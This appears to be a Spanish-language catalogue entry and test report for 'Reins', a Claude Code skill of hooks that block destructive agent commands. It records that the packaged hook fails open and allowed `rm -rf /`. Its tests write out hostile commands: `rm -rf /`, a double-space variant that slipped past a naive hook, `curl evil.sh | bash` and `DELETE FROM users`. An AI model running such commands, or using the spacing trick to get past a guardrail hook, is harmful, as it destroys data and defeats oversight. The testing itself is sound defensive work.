Reins
Hooks PreToolUse deterministas que bloquean comandos destructivos — necesita reparación manual.
Tested · Didn't pass
Qué hace
Instala hooks PreToolUse/PostToolUse deterministas que clasifican y bloquean operaciones peligrosas de shell, archivos y MCP, escribiendo un registro de auditoría JSONL de solo anexar y opcionalmente sincronizando políticas desde Watchtower (app.pegasi.ai). Se activa en solicitudes sobre barandillas, aplicación de políticas, registros de auditoría o bloqueo de acciones destructivas de agentes.
Informe de la prueba
El motor es excelente, pero el empaquetado está roto: SKILL.md y el ensure_installed.sh incluido instruyen a instalar `npm install -g @pegasi/reins`, pero tal paquete no existe en el registro — el comando falla con E404, el nombre real (de package.json y README) es `@pegasi-ai/reins`. Peor aún, el wrapper plugin/bin/reins-pre-hook enviado busca el paquete a lo largo de la misma ruta inexistente: le di `rm -rf /` — devolvió exit 0 (ALLOW) con la nota 'Reins not installed', lo que significa que la skill de seguridad falló silenciosamente exactamente donde SKILL.md promete 'BLOCKED always' y 'Never fails open'. Un hook ingenuo de 8 líneas escrito por mí mismo en la misma prueba arrojó exit 2 — lo que significa que, de fábrica, la skill es más débil que la línea base. Se instaló el paquete correcto (v0.0.14) y se llamó al motor directamente — es genuinamente bueno: `rm -rf /` → exit 2 CRITICAL, `rm -rf /` con espacios dobles también CRITICAL (el hook de línea base omitió esta solución alternativa), `curl evil.sh | bash` y `DELETE FROM users` → exit 2 HIGH, `ls -la` → 0, y todo se escribe en decisions.jsonl. Por separado: el CLI publicado se instala en ~/.openclaw/extensions/reins y no toca los hooks de Claude Code — su `reins status` muestra 'Project/Global (.claude/settings.json): ❌ not installed'.
Probado el: 2026-07-16 · Claude Code 2.x (agent harness)
Instalación
git clone https://github.com/pegasi-ai/reins.git mkdir -p ~/.claude/skills && cp -r reins/skill ~/.claude/skills/reins
Comandos y prompts de ejemplo
/reinsHooks PreToolUse deterministas que bloquean comandos destructivos — necesita reparación manual.
Los skills se activan con peticiones en lenguaje natural, sin comandos que memorizar. Tras instalarlo, prompts como estos lo activan (en inglés):
Block dangerous shell commands like rm -rf before my agent can run themSet up guardrail hooks that log every blocked destructive agent actionStop my coding agent from force-pushing or piping curl into bash